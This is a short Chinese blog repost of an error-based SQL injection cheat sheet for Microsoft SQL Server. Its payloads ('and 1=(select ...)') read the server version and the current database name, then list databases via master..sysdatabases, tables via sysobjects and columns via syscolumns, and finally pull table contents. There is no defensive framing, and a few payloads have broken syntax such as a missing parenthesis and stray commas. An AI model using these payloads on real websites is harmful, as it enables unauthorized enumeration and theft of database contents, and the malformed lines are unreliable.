首页 > 其他 > 详细

显性注入代码

时间:2017-09-28 23:44:50      阅读:253      评论:0      收藏:0      [点我收藏+]

库版本进行查询   and 1=(select @@version)

查看当前库名    and 1=(select db_name() 

库名查询       and 1=(select top 1 name from master..sysdatabases where dbid>4 and name <> ‘第一个数据库库名‘,name <> ‘第二个数据库库名‘,。。。。。。name <> ‘第N个数据库库名’)

表名查询:       and 1=(select top 1 name from sysobjects where xtype=‘u’ and name <> ‘第一个数据库表名‘name <> ‘第二个数据库表名‘,。。。。。。name <> ‘第N个数据库表名’) 

列名查询         and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name=‘表名‘) and name <> ‘第一个列名’,and name <> ‘第二个列名‘。。。。。。and name <> ‘第个列名‘  )

内容查询:       and 1=(select top 1 列名 from 表名) 


显性注入代码

原文:http://dongxiaoyang.blog.51cto.com/12624314/1969576

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!